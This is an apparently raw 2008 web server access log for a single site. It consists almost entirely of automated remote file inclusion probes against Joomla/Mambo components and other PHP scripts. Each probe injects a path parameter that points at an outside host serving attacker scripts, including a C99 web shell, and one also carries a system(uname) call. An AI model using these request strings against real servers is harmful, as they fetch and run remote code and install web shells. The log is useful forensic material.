200.80.42.159 - - [08/Apr/2008:14:39:47 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.185.193.90 - - [08/Apr/2008:14:40:06 -0700] "GET /logs/access_080131.log/index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:40:07 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:14:40:29 -0700] "GET /logs/access_080117.log//modules/xfsection/modify.php?dir_module=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:14:40:29 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:40:55 -0700] "GET /logs/access_071229.log/index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:40:57 -0700] "GET /index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:40:57 -0700] "GET /logs/index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:14:41:07 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:14:41:07 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:41:52 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:41:58 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:42:02 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:42:05 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:42:08 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:42:10 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:42:10 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:42:12 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:42:20 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:42:23 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:42:25 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:14:42:52 -0700] "GET /logs/access_080218.log//modules/xfsection/modify.php?dir_module=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:42:54 -0700] "GET /logs/access_071229.log/index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:42:56 -0700] "GET /index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:42:56 -0700] "GET /logs/index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:14:42:57 -0700] "GET /admin.php?a=http://www.cellularone.ro/cellularone_j/templates/response?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
77.222.128.242 - - [08/Apr/2008:14:42:57 -0700] "GET /logs/admin.php?a=http://www.cellularone.ro/cellularone_j/templates/response?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
70.42.130.240 - - [08/Apr/2008:14:42:58 -0700] "GET /logs/access_080313.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://203.71.212.3/www/modul/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:43:15 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:43:17 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:43:17 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.78.179 - - [08/Apr/2008:14:43:19 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:43:24 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:43:26 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:43:27 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:43:28 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:43:30 -0700] "GET /logs/access_080131.log/index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.174.24.65 - - [08/Apr/2008:14:43:38 -0700] "GET /logs/access_080131.log/main.php?pagina=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.174.24.65 - - [08/Apr/2008:14:43:39 -0700] "GET /main.php?pagina=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.174.24.65 - - [08/Apr/2008:14:43:39 -0700] "GET /logs/main.php?pagina=http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:43:46 -0700] "GET /logs/access_080218.log/_theme/breadcrumb.php?rootBase=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:44:05 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:44:07 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
200.80.42.159 - - [08/Apr/2008:14:44:07 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:44:23 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:44:35 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:14:44:37 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.geocities.com/s.memek/31377os.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.242.100 - - [08/Apr/2008:14:44:38 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.dfmuses.xpg.com.br/uses/alba.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [08/Apr/2008:14:45:11 -0700] "GET /logs/access.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [08/Apr/2008:14:45:11 -0700] "GET //nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [08/Apr/2008:14:45:12 -0700] "GET /logs//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.249.42.221 - - [08/Apr/2008:14:45:23 -0700] "GET //atom.php5?page=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.185.193.90 - - [08/Apr/2008:14:45:25 -0700] "GET /logs/access_080211.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [08/Apr/2008:14:45:44 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:14:45:58 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:14:46:00 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:14:46:00 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.153 - - [08/Apr/2008:14:46:07 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.11.222 - - [08/Apr/2008:14:46:10 -0700] "GET /logs/access_080226.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:46:16 -0700] "GET /logs/access_080218.log//appserv/errors.php?error=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:46:16 -0700] "GET //appserv/errors.php?error=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:46:16 -0700] "GET /logs//appserv/errors.php?error=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:14:46:24 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:14:46:27 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:14:46:28 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.185.237.35 - - [08/Apr/2008:14:46:45 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://skunk1982.altervista.org/mic22.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
64.185.237.35 - - [08/Apr/2008:14:46:50 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://skunk1982.altervista.org/mic22.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:46:53 -0700] "GET /logs/access_080218.log//appserv/errors.php?error=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:46:53 -0700] "GET //appserv/errors.php?error=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:46:53 -0700] "GET /logs//appserv/errors.php?error=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:46:58 -0700] "GET /logs/access_080313.log//appserv/errors.php?error=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.162.238.35 - - [08/Apr/2008:14:47:04 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:47:50 -0700] "GET /logs/access_080313.log//appserv/errors.php?error=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.245.166.86 - - [08/Apr/2008:14:48:05 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.12.24 - - [08/Apr/2008:14:48:14 -0700] "GET /logs/access_071224.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:48:47 -0700] "GET /logs/access_080131.log/index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:48:49 -0700] "GET /logs/access_080131.log/index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:48:49 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:48:50 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:48:56 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:49:01 -0700] "GET /logs/access_080131.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:14:49:07 -0700] "GET /logs/access.log/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.company-domains.net/wsnlinks/admin/php.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:14:49:07 -0700] "GET /logs/access.log/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:49:18 -0700] "GET //public_html/errors.php?error=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:49:19 -0700] "GET /logs/access_080219.log/_theme/breadcrumb.php?rootBase=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:49:20 -0700] "GET /_theme/breadcrumb.php?rootBase=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:49:20 -0700] "GET /logs/_theme/breadcrumb.php?rootBase=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:49:44 -0700] "GET /logs/access.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:49:45 -0700] "GET //nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:49:45 -0700] "GET /logs//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:49:45 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:49:49 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:49:51 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:49:55 -0700] "GET /logs/access_080211.log//nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:49:59 -0700] "GET /logs/access_071229.log//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:50:02 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:50:04 -0700] "GET /logs//index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:50:07 -0700] "GET /logs/access_080312.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:50:08 -0700] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:50:08 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:50:09 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.12.119.178 - - [08/Apr/2008:14:50:10 -0700] "GET //index.php?option=com_glossary&file=2008.l98&action=table//index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:50:13 -0700] "GET /logs/access.log//index.php?option=frontpage&Itemid=system(uname)http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.141.103.91 - - [08/Apr/2008:14:50:15 -0700] "GET //index.php?option=frontpage&Itemid=system(uname)http://keesenmirjam.nl/media/C99-S.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
